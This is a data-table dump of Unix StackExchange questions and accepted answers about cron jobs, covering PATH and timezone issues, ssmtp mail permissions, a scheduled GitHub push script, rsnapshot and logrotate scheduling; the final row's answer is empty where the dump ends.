date int64 1,220B 1,719B | question_description stringlengths 28 29.9k | accepted_answer stringlengths 12 26.4k | question_title stringlengths 14 159 |
|---|---|---|---|
1,370,511,561,000 |
I have various backup-style scripts which run from cron on a headless server (Ubuntu 14.04), typically on a daily schedule. Cron is configured with a mail server so I get feedback from jobs. Normally these backup scripts are written to run without any stdout/stderr output on success (following the standard Unix paradigm that "no news is good news"), so that they don't clog up my email inbox with lots of junk.
From time to time these fail, and I will get a mail immediately with the stdout/stderr output. However, often these failures are for known reasons, and in particular are transient (i.e. they will likely go away again the next day). For example, my internet connection is a little unreliable, and occasionally remote DNS resolutions will fail (assume that's unfixable for the purposes of this question). Of course, that can't be predicted in advance, so reducing the frequency of the job doesn't work.
What I think I would like is for cron to report back to me only after a particular job has failed for more than n attempts, or after a certain period of time, so I can only get reports of 'permanent' errors that I need to address. Is that possible?
I am using cron 3.0pl1-124ubuntu2 on Ubuntu 14.04, although I'm open to other cron-like software and a more general answer (e.g. a wrapper I can place around my scripts) would be very useful to others, I'm sure.
Options I have considered:
Incorporate logic into the script itself to handle this - an option, but I was looking for somewhere a bit more generic - some scripts are bash, some python, etc. Also, this would significantly complicate things, as all stdout/stderr the script then did would like need to sit in a wrapper function.
Use a Continuous Integration server like Jenkins to handle running my jobs - more powerful, probably provides what I'm looking for with various plugins, but significantly more complex to manage, a bit heavyweight (requires a JVM), and not very Unix-y.
noexcuses - A bit too aggressive, since it would retry remote backups, etc., which will tie up resources and potential cause accidental DoSes. I'd rather the cron job was retried on its original schedule.
|
I have now begun to write a wrapper utility to solve my own problem here, called cromer. It is now working in a basic form. Any contributions/pull requests/issues etc. welcome.
| How I can ignore transient failures in scripts run by cron? |
1,370,511,561,000 |
I'm running crontab on Ubuntu 14.04, on DigitalOcean's VPS service.
I've made a web scraper to do a job every two hours.
My issue is, cron disregards the hours I've set and follows the minute instruction.
Here is my cron line
30 8,10,12,14,16 * * * /usr/bin/python /path/to/myscript.py
Instead of doing this job at 8.30am, 10.30am etc, this job ran at 11.30pm tonight. I changed the minutes to 37 and it ran again at 11.37pm.
Before running cron I changed the TZ to my time (Sydney), and when I'm logged into the VPS via the terminal, date returns my local time.
Any ideas what's going wrong?
|
Just to save the answer from the comments:
The problem turned out to be that cron had started under one TZ value; afterwards, the TZ was changed (affecting future processes), but it was not until cron was restarted with the new TZ that cron jobs ran at the correct time.
| Cron not keeping to specified time |
1,370,511,561,000 |
I wrote a script to check for wifi connection that has an "if then else" statement. If I run the script manually the "if" statement is 1, as it should, if the crontab runs it automatically the "if" is 0 and the script runs the else commands. Can someone imagine a reason for it to yield different results?
The script "if" condition is:
if ifconfig wlan0 | grep -q "inet addr:" ; then
|
The ifconfig binary resides in /sbin, which by default is not on the cron path. Use full paths to the commands:
if /sbin/ifconfig wlan0 | /bin/grep -q "inet addr:" ; then
| crontab versus manual running script |
1,370,511,561,000 |
I have a script that checks to see if port 4000 is open and listening, if it is return true, else start a service that also outputs a logfile. The script runs fine if I execute it as a user, but if I add it as a cron it doesn't run. I'm logged in as root, the script is owned by root, the script has executable permissions, and I am running crontab -e as root.
#!/bin/bash
if lsof -Pi :4000 -sTCP:LISTEN -t >/dev/null ; then
return 1
else
seoserver -p 4000 start > /var/www/vhosts/domain.com/httpdocs/seoserver.log &
fi
And here is my cron
*/5 * * * * /usr/bin/seoStart
|
Cron doesn't start with common environment variables that your user has, including $PATH.
You have the full path in your cron, which is good, but you need to add it to your script as well.
which lsof
and
which seoserver
will give you the full path. Modify your script to use that instead of lsof and seoserver.
| Why scripts run as user but not as a cron? |
1,370,511,561,000 |
I tried to set up wallpaper change via cron in /etc/crontab, but I failed.
DISPLAY env set directly / before cmd, but still it's not working:
DISPLAY=:0.0
* * * * * ad env DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/
* * * * * ad DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/
* * * * * ad export DISPLAY=:0.0; /usr/bin/awsetbg -a -r /home/ad/img/beauty/
su - user -c "cmd" worked:
* * * * * root su - ad -c "DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/"
Now I'm using user's crontab (crontab -e) which works fine:
*/10 * * * * DISPLAY=:0.0 /usr/bin/awsetbg -a -r /home/ad/img/beauty/
What else do I have to set?
cron's env:
MAILTO=root
SHELL=/bin/bash
USER=ad
PATH=/sbin:/bin:/usr/sbin:/usr/bin
PWD=/
SHLVL=1
HOME=/
LOGNAME=ad
DISPLAY=:0.0 # same result for DISPLAY=:0
_=/bin/env
Using vixie-cron 4.1-r1 on Gentoo.
|
I guess it's changing HOME=/ to HOME=/home/ad.
| Changing user's wallpaper via system crontab |
1,370,511,561,000 |
I am doing a Makefile which I run regularly by Crontab every day at 0230
crontab -e; 30 2 * * * /bin/thePseudocode
Python-like Pseudocode
directories = ["Cardiology", "Rheumatology", "Surgery"]
for directory in directories
files = directory.files(); % not sure if such a parameter exists
files = files.match(.*tex); % trying to get only tex files; not sure if match exists
summaryFile = "";
for texFile in files
summaryFile.add( ...
textFile.match( (?s)\\begin{question}.*?\\end{question} ) ...
)
% Solution based on this thread
% Problem in writing this Regex in Perl http://unix.stackexchange.com/questions/159307/to-match-only-innermost-environment-by-regex
end
end
save this `summaryFile` as /Users/Masi/Dropbox/QuestionSummary.tex
where files is the list of all files in the directory, and summaryFile is the file which lists all questions in all tex-files.
Those files, I want finally compile by pdflatex and read each morning by pdf-reader.
Example file which locates in the folder Rheumatology
\section{Takayasu arteritis}
\begin{question}
{You get a patient.
What do you notice first in this patient?}
Absence of peripheral pulse.
\end{question}
\begin{question}
{What was the first Takayasu case?}
Young woman in Asia with red vessels in the eye.
So special eye diagnosis done.
Affects eye.
\end{question}
Fever of unknown origin can be used when you do not know what is causing the disease.
% Show cases in MedScape and ask class.
Aneurysms.
\subsection{Treatment}
\begin{question}
{What you should always include in Takayasu treatment?
What are the symptoms?}
Blood pressure.
Aneurysms which will burst without treatment.
So blood pressure decreasing drugs like beta blockers along in combination with other drugs.
\end{question}
\begin{question}
{When is the checkup of the Takayasu arteritis?}
Only once per year.
You could expect every month like normally in this kind of diseases.
But only once per year.
\end{question}
where the output should be for all files in the folder
\section{Rheumatology}
\begin{question}
{You get a patient.
What do you notice first in this patient?}
Absence of peripheral pulse.
\end{question}
\begin{question}
{What was the first Takayasu case?}
Young woman in Asia with red vessels in the eye.
So special eye diagnosis done.
Affects eye.
\end{question}
\begin{question}
{What you should always include in Takayasu treatment?
What are the symptoms?}
Blood pressure.
Aneurysms which will burst without treatment.
So blood pressure decreasing drugs like beta blockers along in combination with other drugs.
\end{question}
\begin{question}
{When is the checkup of the Takayasu arteritis?}
Only once per year.
You could expect every month like normally in this kind of diseases.
But only once per year.
\end{question}
Makefile
all:
pdflatex /Users/Masi/Dropbox/QuestionsSummary.tex /Users/Masi/Dropbox/QuestionsSummary.pdf
pdflatex /Users/Masi/Dropbox/QuestionsSummary.tex /Users/Masi/Dropbox/QuestionsSummary.pdf % to compile a few times to be successful
pdflatex
% I am not sure if I should have some error management, since often the pdflatex crashes
% So pdflatex is not probably the right tool to go
How can you such a pseudocode in any tools preferred by you?
I like Python but would not make all by it.
|
If I understand correctly, you're looking for something like this (in bash):
#!/usr/bin/env bash
## avoid errors if a directory has no *tex files
shopt -s nullglob
directories=("Cardiology" "Rheumatology" "Surgery");
## Change this to set whichever options you want.
printf "%s\n%s\n" "\documentclass{YOURCLASS}" "\begin{document}"
for directory in ${directories[@]}
do
## Reset the counter, avoid empty sections.
c=0;
for file in "$directory"/*tex
do
let c++
[ "$c" -eq 1 ] && printf "\n%s\n" "\section{$directory}"
## Extract the wanted lines
perl -lne '$a=1 && print "" if /\\begin{question}/;
print if $a==1;
$a=0 if /\\end{question}/;' "$file"
echo ""
done
done
echo "\end{document}"
If you run that script from the directory that contains Cardiology etc, it should provide output like this:
| To write this Pseudocode with Regex |
1,370,511,561,000 |
crontab -e
0 */4 * * * root /usr/bin/rsnapshot hourly
30 3 * * * root /usr/bin/rsnapshot daily
0 3 * * 1 root /usr/bin/rsnapshot weekly
30 2 1 * * root /usr/bin/rsnapshot monthly
tail /var/log/cron
Jun 13 21:01:01 web-backups run-parts(/etc/cron.hourly)[2795]: starting 0anacron
Jun 13 21:01:01 web-backups run-parts(/etc/cron.hourly)[2806]: finished 0anacron
Jun 13 22:01:01 web-backups CROND[2810]: (root) CMD (run-parts /etc/cron.hourly)
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2810]: starting 0anacron
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2819]: finished 0anacron
Jun 13 22:01:01 web-backups CROND[2822]: (root) CMD (run-parts /etc/cron.hourly)
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2822]: starting 0anacron
Jun 13 22:01:01 web-backups run-parts(/etc/cron.hourly)[2831]: finished 0anacron
Jun 13 22:44:59 web-backups crontab[2854]: (root) BEGIN EDIT (root)
Jun 13 22:45:07 web-backups crontab[2854]: (root) END EDIT (root)
But I am not seeing my cronjobs run.
I can run the tasks manually and they run fine.
|
The format you are using for your crontab is the /etc/cron.d format. When using crontab -e to edit the crontab, the username is not specified. The user used to run the job is the user that ran crontab -e.
Basically, change to this:
0 */4 * * * /usr/bin/rsnapshot hourly
30 3 * * * /usr/bin/rsnapshot daily
0 3 * * 1 /usr/bin/rsnapshot weekly
30 2 1 * * /usr/bin/rsnapshot monthly
| Crontab does not run? |
1,370,511,561,000 |
I've experienced an issue where some of my scripts run perfectly fine when I call them manually, but these same scripts when called as cron jobs via cron don't seem to work at all.
So my question: I'd like to know if there are restrictions that apply with the use of commands and/or scripts (and the privilege of execution) in a script scheduled to run with cron?
|
The most common reason why commands that work fine from the command line would fail under cron is the fact they run under a stripped down environment with only a handful of variables defined.
In particular PATH is set to its default value.
Any customization done in dot files (.profile /etc/profile and the likes) is not done with cron scripts but of course, this can be fixed by modifiying the cron entry or the called script itself.
The fact the script is non interactive and missing a graphic environment (DISPLAY variable) might also affect scripts to run as expected.
| Does cron impose some limitations to types of commands and privilege of execution? [duplicate] |
1,369,877,415,000 |
I have a backup script which is run daily by Anacron. It can take around 3 hours to complete.
I'm happy for Anacron not to commence the script if the laptop is running on batteries, but once started, I don't want it to be terminated if battery mode commences, since doing so leaves me with an incomplete backup and a false sense of security. The backup uses rsnapshot, which rotates the backups.
How can I disable Anacron's monitoring of power mode for running jobs (or otherwise work around this behaviour)?
I'm running Kubuntu 12.04.2.
|
Found this blog post titled: Linux: Anacron tips, which describes how to block anacron from getting killed when the power state is on battery:
excerpt from blog post
IMPORTANT: If your are using anacron on a laptop, anacron will stop
(get killed) when running on battery and your scripts will not get
executed. This is the default behavior, to save battery.
To change this do the following:
sudo gedit /usr/lib/pm-utils/power.d/anacron
and change to:
case $1 in
false)
start -q anacron || :
;;
true)
start -q anacron || :
;;
esac
| How to prevent the termination of Anacron jobs after battery mode commences? |
1,369,877,415,000 |
I want to be able to push a repository to Github at midnight, every night. I know that Github isn't a back-up service, and, in no way am I expecting it to be this - I just want the best up-to-date version on Github and this works for me, and, my team. What I was thinking is this:
Creating a Bash script that pushes the repository to Github normally
In Crontab, execute the script at midnight every day of the week.
Would this be the best method to use? If so, this seems easy enough to do.
My next problem :) I want an email to be sent to me, after the repository has been pushed, so it would just send an email saying: "Repository Pushed.. Ok" or if there was a problem, it would alert me to this. Is this possible? If so, could anyone please provide some examples of how to do this.
Hope someone can help :)
|
As the links described as harish.venkat
Create a script /path_to_script, which would add new file, commit and push.
#!/bin/sh
cd /location/of/clone
git add *
if [[ $? != 0 ]] then
mail -s "add failed" [email protected]
exit 1
fi
git commit -a -m "commit message, to avoid being prompted interactively"
if [[ $? != 0 ]] then
mail -s "commit failed" [email protected]
exit 1
fi
git push
if [[ $? != 0 ]] then
mail -s "push failed" [email protected]
exit 1
fi
mail -s "push ok" [email protected]
Change the script to executable,
chmod a+x /path_to_script
Use crontab -e and add below line
# run every night at 03:00
0 3 * * * /path_to_script
| Crontab with Github |
1,369,877,415,000 |
I'm trying to use cron for the first time, and I'm stuck.
I'm using Ubuntu 10.10, and the following is my /etc/crontab file. The only modification that I've made is appending the last line.
I've verified that cron is running, and the other jobs here run, but the last one does not.
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
21 22 * * * root /etc/mycron/myscript.sh > /home/me/stuff/log/cron.log
I've checked $ sudo grep CRON /var/log/syslog and found evidence of the hourly jobs, but nothing for the new job.
I've looked for cron.allow and cron.deny files, but they don't seem to exist on my machine.
|
I hate to ask the obvious, but is /etc/mycron/myscript.sh executable? You can check with:
ls -l /etc/mycron/myscript.sh
Should generally see 3 x's. If not, try:
chmod -V +x /etc/mycron/myscript.sh
You can also use sh or bash to run the script, using this line in the cron instead:
sh /etc/mycron/myscript.sh
| Cron job not executing |
1,369,877,415,000 |
I need to create and put my cron file with
cat cronfile1 cronfile2 > cronfile
crontab cronfile -u myuser
This works for me, but I want to know if I can do directly
cat cronfile1 cronfile2 > /var/spool/cron/crontabs/myuser
Of course I am root, and I'm doing this from busybox. Is it safe or am I doing something wrong and should use the crontab command instead?
|
You should use the crontab command so that the daemon notified about the chanage and parse errors can be warned about. It is not advisable to manually write the file.
| Can I bypass crontab command by putting the file? |
1,369,877,415,000 |
I'm trying to zip a directory and copy it over as a backup. I'm new to Linux to so I followed guides as best as I could, but when trying
systemctl status cron
I get the following error:
Apr 27 13:34:01 mc-server cron[950]: Error: bad username; while reading /etc/crontab
Running the command standalone works as expected (the 3 minute timer was only for testing purposes).
This is the full crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root zip -r -q /mnt/truenas/Ozone/Backup_$(TZ="Europe/Berlin" date "+%A_%d.%m.%y_%H;%M").zip /home/rexor/mcserver
#
|
From man 5 crontab:
The ``sixth'' field (the rest of the line) specifies the command to be run. The entire command portion of the line, up to a newline or % character, will be executed by /bin/sh or by the shell specified in the SHELL variable of the crontab file. Percent-signs (%) in the command, unless escaped with backslash (\), will
be changed into newline characters, and all data after the first % will be sent to the command as standard input. There is no way to split a single command line
onto multiple lines, like the shell's trailing "\".
I'm not sure why this causes the mentioned error, but try escaping the '%' in your commands and see if it helps:
*/3 * * * * root zip -r -q /mnt/truenas/Ozone/Backup_$(TZ="Europe/Berlin" date "+\%A_\%d.\%m.\%y_\%H;\%M").zip /home/rexor/mcserver
| Why is my crontab giving me a bad username error? |
1,369,877,415,000 |
We are trying to schedule a script to run at 9am ET every day throughout the year, regardless of daylight savings. On our GCP Compute Engine / Linux Server, cron runs in UTC always. It is easy enough to adjust -4 or -5 hours to run in ET, however the issue of daylight savings is (mildly) problematic, as we have to change the cron time by +/- 1 hour at daylight savings for it to remain at 9am ET.
In R, rather than using EDT, we can set the timezone environment to America/New_York, which seems to account automatically for daylight savings, always running at 9am regardless of EDT vs EST. Is there anyway to schedule in cron so that something runs at 9am ET always?
|
Try setting both of these in your cron:
CRON_TZ='America/New_York'
TZ='America/New_York'
EDIT: you can put the shell file wherever you like.
On the tar line, you'll enter the command you need executed (be it a script or whatever).
crontab -e and type the CRON_TZ=<YOUR/TZ>
Right below CRON_TZ you point to the location of the shell script/command you want executed.
Remember to make sure that the script is executable.
| Run crontab in America/New_York time zone |
1,369,877,415,000 |
I have installed ssmtp on an raspberry pi running Raspbian 10 Buster. Email from the command line, e.g. using mail works fine. However, I have also configured a user's cron job to send email by adding the MAILTO variable to the file.
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
MAILTO="[email protected],[email protected]"
# we need to set the user path to add the system scripts directory /usr/local/sbin
# I tried with PATH=$PATH:/usr/local/sbin but it used this verbatim in the path
PATH=/usr/sbin:/usr/bin:/bin:/usr/local/sbin:
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
26 3 * * * cronic python3 ~/redacted_directory_name/redacted_script_name.py
24 22 * * * echo "Testing cron email"
as I understand from other online searches (correct me if I'm wrong), cron uses sendmail by default to send emails.
Sendmail is available on the system, but it is really ssmtp
$ which sendmail
/usr/sbin/sendmail
$ ls -l /usr/sbin/sendmail
lrwxrwxrwx 1 root root 5 Jul 20 2014 /usr/sbin/sendmail -> ssmtp
On this machine I have configured ssmtp to use an external SMTP server to send mail.
cron doesn't send email either for root or another non-sudo user.
In the logs for mail I see the following
$ tail /var/log/mail.log
Jan 17 16:43:02 ed-mh-pi01 sSMTP[25679]: Cannot open mailhub:25
Jan 18 03:22:24 ed-mh-pi01 sSMTP[9846]: Creating SSL connection to host
Jan 18 03:22:25 ed-mh-pi01 sSMTP[9846]: SSL connection using ECDHE_RSA_AES_256_GCM_SHA384
Jan 18 03:22:26 ed-mh-pi01 sSMTP[9846]: Sent mail for root@[email protected] (221 2.0.0 Bye) uid=0 username=root outbytes=638
Jan 18 22:20:02 ed-mh-pi01 sSMTP[6924]: /etc/ssmtp/ssmtp.conf not found
Jan 18 22:20:02 ed-mh-pi01 sSMTP[6924]: Unable to locate mailhub
Jan 18 22:20:02 ed-mh-pi01 sSMTP[6924]: Cannot open mailhub:25
Jan 18 22:24:01 ed-mh-pi01 sSMTP[6988]: /etc/ssmtp/ssmtp.conf not found
Jan 18 22:24:01 ed-mh-pi01 sSMTP[6988]: Unable to locate mailhub
Jan 18 22:24:01 ed-mh-pi01 sSMTP[6988]: Cannot open mailhub:25
The entries for Jan 18 22:20:02 and Jan 18 22:24:02 appear to be related to the cron job email. I did a couple of tests at these times.
It states that whatever process is sending the email does not have access to /etc/ssmtp/ssmtp.conf. On the Arch linux wiki it states that
The /usr/bin/ssmtp binary runs as the mail group and can read this
file. There is no reason to add yourself or other users to the mail
group.
I don't know if that is true for raspbian, but it made me think that perhaps this was the problem. I experimented with changing the group ownership of /etc/ssmtp/ and its contents to mail, like so:
$ ls -l /etc/ssmtp/
total 8
-rw-r--r-- 1 root mail 200 Jul 20 2014 revaliases
-rw-r----- 1 root mail 764 Jan 17 12:03 ssmtp.conf
However, the problem persists
[root] ~ $ tail /var/log/mail.log
<snip>
Jan 18 22:39:01 ed-mh-pi01 sSMTP[7559]: /etc/ssmtp/ssmtp.conf not found
Jan 18 22:39:01 ed-mh-pi01 sSMTP[7559]: Unable to locate mailhub
Jan 18 22:39:01 ed-mh-pi01 sSMTP[7559]: Cannot open mailhub:25
So, why is cron not sending email, and how can I fix it?
EDIT
If I change (temporarily) the permissions on /etc/ssmtp/ssmtp.conf to allow any user to read, the emails are sent. This is not a solution as this file contains the plain text password for the email account, and also doesn't explain why normal users can send from the command line, but cron cannot.
EDIT 2
$ ls -l /usr/sbin/ssmtp
-rwxr-xr-x 1 root root 30588 Jul 20 2014 /usr/sbin/ssmtp
|
You've written that,
The /usr/bin/ssmtp binary runs as the mail group and can read this file
But you have shown that this is not the case for your binary:
-rwxr-xr-x 1 root root 30588 Jul 20 2014 /usr/sbin/ssmtp
What the Wiki says is,
Because your email password is stored as cleartext in /etc/ssmtp/ssmtp.conf, it is important that this file is secure. By default, the entire /etc/ssmtp directory is accessible only by root and the mail group. The /usr/bin/ssmtp binary runs as the mail group and can read this file. There is no reason to add yourself or other users to the mail group.
So you need to correct the broken permissions:
chown -R root:mail /etc/ssmtp /usr/sbin/ssmtp
chmod -R g=u,g-w,o= /etc/ssmtp
chmod a=rx,g+s /usr/sbin/ssmtp
However I should also point out that the first thing the Arch wiki says is,
sSMTP is unmaintained. Consider using something like msmtp or OpenSMTPD instead
| Cron not sending email, command line email works |
1,369,877,415,000 |
I have an issue that has probably something to do with the PATH variable.
This is a email I got with error about a script running in cron:
Cron Daemon <mail.org>
05:08 (15 hours ago)
to root, bcc: me
mail: Null message body; hope that's ok
tar: Fjerner indledende '/' fra medlemsnavne
mail: Null message body; hope that's ok
/home/user/bin/checkSystem: linje 16: chkrootkit: command not found
mail: Null message body; hope that's ok
/home/user/bin/checkSystem: linje 21: logwatch: command not found
/home/user/bin/checkSystem: linje 22: logwatch: command not found
/home/uesr/bin/checkSystem: linje 23: logwatch: command not found
mail: Null message body; hope that's ok
mail: Null message body; hope that's ok
mail: Null message body; hope that's ok
I just changed the owner of the script from user to root
$ls -sail /home/user/bin/checkSystem
541784 4 -rwxr-x--- 1 root root 1235 aug 23 14:05 /home/user/bin/checkSystem
crontab -e
1 # Edit this file to introduce tasks to be run by cron.
2 #
3 # Each task to run has to be defined through a single line
4 # indicating with different fields when the task will be run
5 # and what command to run for the task
6 #
7 # To define the time you can provide concrete values for
8 # minute (m), hour (h), day of month (dom), month (mon),
9 # and day of week (dow) or use '*' in these fields (for 'any').#
10 # Notice that tasks will be started based on the cron's system
11 # daemon's notion of time and timezones.
12 #
13 # Output of the crontab jobs (including errors) is sent through
14 # email to the user the crontab file belongs to (unless redirected).
15 #
16 # For example, you can run a backup of all your user accounts
17 # at 5 a.m every week with:
18 # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
19 #
20 # For more information see the manual pages of crontab(5) and cron(8)
21 #
22 # m h dom mon dow command
23 0 5 * * 1 /home/user/bin/checkSystem
Here is the script:
#!/bin/bash
2 date=`date +%d-%m-%y`
3 mail="mail.org"
4
5 ## rkhunter
6 #rkhunter --update
7 rkhunter --checkall --cronjob --report-warnings-only > rkhunter-check-$date.log
8 mail -A rkhunter-check-$date.log -s "rkhunter-check" $mail < /dev/null 2>&1
9 rm rkhunter-check-$date.log
10 tar -cf rkhunter-log-$date.tar /var/log/rkhunter.log
11 gzip rkhunter-log-$date.tar
12 mail -A rkhunter-log-$date.tar.gz -s "rkhunter-log" $mail < /dev/null 2>&1
13 rm rkhunter-log*.tar.gz
14
15 ## chkrootkit
16 chkrootkit > chkrootkit-$date.log
17 mail -A chkrootkit-$date.log -s "chkrootkit" $mail < /dev/null 2>&1
18 rm chkrootkit-$date.log
19
20 ## logwatch
21 logwatch --output html --detail High --range All > logwatch-all-$date.html
22 logwatch --output html --detail High --range Today > logwatch-today-$date.html
23 logwatch --output html --detail High --range Yesterday > logwatch-yesterday-$date.html
24 mail -A logwatch-all-$date.html -s "logwatch all" $mail < /dev/null 2>&1
25 mail -A logwatch-today-$date.html -s "logwatch today" $mail < /dev/null 2>&1
26 mail -A logwatch-yesterday-$date.html -s "logwatch yesterday" $mail < /dev/null 2>&1
27 rm -f logwatch-*.html
28
29 ## testing command
30 #echo "Just testing my sendmail gmail relay" | mail -s "Sendmail gmail Relay" mail.org
What's the deal?
EDIT:
(root@host)-(20:39:01)-(/home/user)
$which logwatch
/usr/sbin/logwatch
(root@host)-(20:39:06)-(/home/user)
$which chkrootkit
/usr/sbin/chkrootkit
(root@host)-(20:39:16)-(/home/user)
$which rkhunter
/usr/bin/rkhunter
(root@host)-(20:39:22)-(/home/user)
$
|
When the cronjob is run, 'logwatch' cannot be found.
Since logwatch is installed, this probably means that it's missing from the path.
You can fix this by adding '/usr/sbin' to the PATH in the /etc/crontab file.
Another way to fix this if you don't have privileges to edit /etc/crontab is simply to use the full path to the executable directly in the script.
| cron script cannot find logwatch and chkrootkit |
1,369,877,415,000 |
I know this sounds weird...
I have a project which will run "logrotate myConf.conf" automatically every hour.
Besides, in my cron/, there is also a logrotate running...
The two process might have chance to modify the same log file
In this case what will happen?
Will the log file be totally screwed? or just one of the command will fail? (which is good enough)
|
Yes, there may be issues relating to the state file that logrotate keeps.
See my answer to a question about a corrupt state file due to concurrent runs of logrotate from cron:
/var/lib/logrotate/status gets invalid entries
The summary: be sure that your specific rotation job is either run as part of the system's ordinary rotation job, or run it from a personal cron job and use a separate state file (specified with the -s option to logrotate). I either case, only run the rotation from one cron job.
| what if two logrotate run concurrently |
1,369,877,415,000 |
I want a python script to send notification. The script can be run successfully and show what I want. but crontab did not boot it in right way.
the following is the the code refer to the libnotify
def SendMessage(title, message):
pynotify.init("ChinaBank")
notice = pynotify.Notification(title,message)
notice.show()
return
what I did in crontab is
* * * * * display=`/home/li/script/FetchDisplay.sh` && export DISPLAY=$display && /home/li/projects/fetch-data/EuroForex.py 2>/home/li/error
Here, the FetchDisplay.sh is to get the display as following:
#!/bin/bash
if [ "$DISPLAY" != "" ]; then
echo $DISPLAY
exit
fi
if ["$USER" = "" ]; then
USER=`whoami`
fi
pinky -fw | awk -v user=$USER 'NF == 6 {if($1 == user) {print $6}}' | awk 'NR==1{print $0}
the error output is
Traceback (most recent call last):
File "/home/li/projects/fetch-data/EuroForex.py", line 43, in <module>
SendMessage("Please be ready to sell", str(SellData))
File "/home/li/projects/fetch-data/EuroForex.py", line 15, in SendMessage
notice.show()
glib.GError: Error spawning command line 'dbus-launch --autolaunch=970be6bbf9ff49009918057c308cf56e --binary-syntax --close-stderr': Child process exited with code 1
I know the DISPLAY is :0, through the command
echo $DISPLAY
therefore, I test the gnome-screensaver-command with it.
* * * * * export DISPLAY=:0 && /usr/bin/gnome-screensaver-command --lock 2>/home/li/screenerror
Unfortunately, it did not work, and the output is
** Message: Failed to get session bus: Error spawning command line 'dbus-launch --autolaunch=970be6bbf9ff49009918057c308cf56e --binary-syntax --close-stderr': Child process exited with code 1
I thought it is the problem of DISPLAY, but the variable DISPLAY is correct. Could you tell what is going on?
|
I find the answer from here.
Update Pidgin IM status on Ubuntu using cron
cron run in its own environment, therefore, we have to find the variables DBUS_SESSION_BUS_ADDRESS, XAUTHORITY, and DISPLAY. I followed the instruction and succeeded to set the variables.
My script can work now!
| dbus-laauch failed caused by the child process exited |
1,369,877,415,000 |
So, I am having some trouble with my cron setup - I am assuming it is a mistake I have made as this is the first time I have set it up. I have two jobs I have setup in cron, one to run at 1am the other at 2am, daily. This is my /etc/crontab:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
0 1 * * * root /usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix > "/backups/zabbix_mysqldb.sql_$(date +%F_%R)"
0 2 * * * root /usr/bin/sh /zabbix_scripts/mysql_backup_script/zabbix-mysql-dump -p somepassword -o /backups
Here is what I am seeing in /var/log/cron:
Feb 7 01:00:01 adlmonitor01 CROND[17334]: (root) CMD (/usr/local/mysql/bin/mysqldump -usomeuser -psomepassword --opt zabbix > "/backups/zabbix_mysqldb.sql_$(date +)
Feb 7 01:01:01 adlmonitor01 CROND[17539]: (root) CMD (run-parts /etc/cron.hourly)
Feb 7 01:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[17539]: starting 0anacron
Feb 7 01:01:01 adlmonitor01 anacron[17548]: Anacron started on 2017-02-07
Feb 7 01:01:01 adlmonitor01 anacron[17548]: Normal exit (0 jobs run)
Feb 7 01:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[17550]: finished 0anacron
Feb 7 02:00:01 adlmonitor01 CROND[28788]: (root) CMD (/usr/bin/sh /zabbix_scripts/mysql_backup_script/zabbix-mysql-dump -p somepassword -o /backups)
Feb 7 02:01:01 adlmonitor01 CROND[28992]: (root) CMD (run-parts /etc/cron.hourly)
Feb 7 02:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[28992]: starting 0anacron
Feb 7 02:01:01 adlmonitor01 anacron[29001]: Anacron started on 2017-02-07
Feb 7 02:01:01 adlmonitor01 anacron[29001]: Normal exit (0 jobs run)
Feb 7 02:01:01 adlmonitor01 run-parts(/etc/cron.hourly)[29003]: finished 0anacron
My guess is a syntax mistake I have made, but I can't seem to figure out where, could someone shed some light?
|
